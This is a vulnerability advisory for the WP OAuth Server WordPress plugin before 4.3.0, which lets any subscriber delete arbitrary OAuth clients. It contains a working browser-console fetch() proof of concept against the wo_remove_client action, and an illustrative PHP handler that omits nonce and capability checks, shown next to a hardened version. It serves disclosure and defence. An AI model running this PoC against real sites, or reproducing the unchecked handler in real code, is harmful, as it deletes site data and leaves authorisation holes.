wpvulndb | Lana Codes | WPVDB-ID: BE9B25C8-B0D7-4C22-81FF-E41650A4ED41
History: Feb 21, 2023 - 12:00 a.m.

WP OAuth Server < 4.3.0 - Subscriber+ Arbitrary Client Deletion

2023-02-21 00:00:00
Lana Codes
wpscan.com
7
wp oauth server
arbitrary client deletion
flawed csrf
authorisation check
authenticated user

EPSS: 0.001 (Low)
EPSS Percentile: 20.0%

The plugin's client-deletion AJAX action has a flawed CSRF and authorisation check: it neither verifies a nonce nor checks the caller's capability, so any authenticated user, such as a subscriber, can delete arbitrary OAuth clients by ID.

PoC

Run the command below in the browser's developer console while logged in to the blog as any authenticated user, such as a subscriber. It calls the wo_remove_client AJAX action and deletes the client with ID 123 (no nonce is sent, because none is checked):

fetch('/wp-admin/admin-ajax.php', {
  method: 'POST',
  headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded' }),
  body: 'action=wo_remove_client&client_id=123',
  redirect: 'follow'
})
  .then(response => response.text())
  .then(result => console.log(result))
  .catch(error => console.log('error', error));
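The flaw the advisory describes is a wp_ajax handler that relies only on the caller being logged in. The following is an added illustration, not the plugin's own code: a handler with the missing checks beside a hardened one. Only the action name wo_remove_client comes from the PoC; the helper wo_delete_client_by_id, the nonce action wo_client_nonce and the required capability manage_options are assumptions for this example.

```php
<?php
// Added illustration of the vulnerability class, not WP OAuth Server's code.
// Assumed names: wo_delete_client_by_id (helper that removes a client row),
// wo_client_nonce (nonce action), manage_options (capability required to manage clients).

// Vulnerable pattern: wp_ajax_ hooks only require a logged-in session, so every
// authenticated role reaches this, and nothing verifies a nonce or a capability.
function wo_remove_client_vulnerable() {
    $client_id = isset( $_POST['client_id'] ) ? absint( $_POST['client_id'] ) : 0;
    wo_delete_client_by_id( $client_id ); // assumed helper
    wp_send_json_success( array( 'deleted' => $client_id ) );
}

// Hardened pattern: CSRF check, authorisation check, then input validation.
function wo_remove_client_hardened() {
    // 1. CSRF: require a valid nonce for this action. check_ajax_referer() terminates
    //    the request (HTTP 400 / -1) when the nonce is missing or invalid.
    check_ajax_referer( 'wo_client_nonce', '_wpnonce' );

    // 2. Authorisation: demand a capability, not merely an authenticated user.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    // 3. Validate the identifier before touching storage.
    $client_id = isset( $_POST['client_id'] ) ? absint( $_POST['client_id'] ) : 0;
    if ( $client_id <= 0 ) {
        wp_send_json_error( array( 'message' => 'invalid client_id' ), 400 );
    }

    wo_delete_client_by_id( $client_id ); // assumed helper
    wp_send_json_success( array( 'deleted' => $client_id ) );
}

// Register the hardened handler for logged-in users only (no wp_ajax_nopriv_ hook).
add_action( 'wp_ajax_wo_remove_client', 'wo_remove_client_hardened' );

// The admin page that issues the request must receive a matching nonce, e.g.
// wp_create_nonce( 'wo_client_nonce' ) passed to its script via wp_localize_script(),
// and send it as the _wpnonce POST field alongside action and client_id.
```

With the hardened handler the PoC above fails twice over: the request carries no _wpnonce, so check_ajax_referer() rejects it before any code runs, and even a forged page that obtained a nonce for a subscriber would stop at the capability check.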

CPE Name | Operator | Version
oauth2-provider | lt | 4.3.0
